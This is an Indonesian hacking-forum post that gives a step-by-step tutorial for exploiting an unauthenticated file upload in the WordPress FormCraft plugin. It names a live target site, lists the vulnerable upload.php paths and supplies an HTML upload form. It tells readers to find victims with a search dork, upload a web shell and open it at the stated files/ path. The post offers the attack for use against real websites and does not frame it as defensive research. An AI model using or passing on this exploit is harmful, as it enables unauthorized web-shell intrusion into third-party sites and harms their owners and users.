Live Target : http://quiropracticoqro.com/
Exploit :
Code:
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/
Script CSRF :
Code:
<form method="POST" action="http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*Save As .html
Cari target menggunakan dork di atas
![:troll:](https://forum.incef.or.id/images/smilies/f73b773aa689647cb09f57f67a83bb89.png)
Lalu masukkan exploit yang di atas
![:lol:](https://forum.incef.or.id/images/smilies/8600839dc03e6275b53fd03a0eba09cf.gif)
Jika Vuln akan nampak seperti ini
![:ngakak:](https://forum.incef.or.id/images/smilies/e49c8ae965452550c98fc7f99741ae0d.gif)
Vuln :[/color
Sekarang tinggal edit targetnya di Script CSRF yang tadi ..
Sekarang buka filenya dengan browser yang mastah gunakan
![:sungkem:](https://forum.incef.or.id/images/smilies/95e69aa508d4bb435706b9db0a610dad.gif)
Lalu upload deh shell kesangannya
![:joget1:](https://forum.incef.or.id/images/smilies/4ad099fba019942f13058610ff3fc568.gif)
Setelah upload maka akan nampak seperti ini
Shell Access : http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php
Jika Berhasil Akan Muncul Shell Kesayangan Sobat
![:cool:](https://forum.incef.or.id/images/smilies/70722ab5756c3b89c86d85feab91725d.gif)
Tapi Jika Ga Muncul Berarti Sobat Kurang Ganteng Kata Mr. DellatioNx196
![:vv](https://forum.incef.or.id/images/smilies/ced6d40bebe2d424b59322b311fc04bb.gif)
Sekian, Semoga bermanfaat
![:nyengir:](https://forum.incef.or.id/images/smilies/843739a95294fd0bf4c958840b46408f.gif)
Wassalamualaikum
![:sibuk:](https://forum.incef.or.id/images/smilies/0efc4d55d28704f4370ef874ae906161.gif)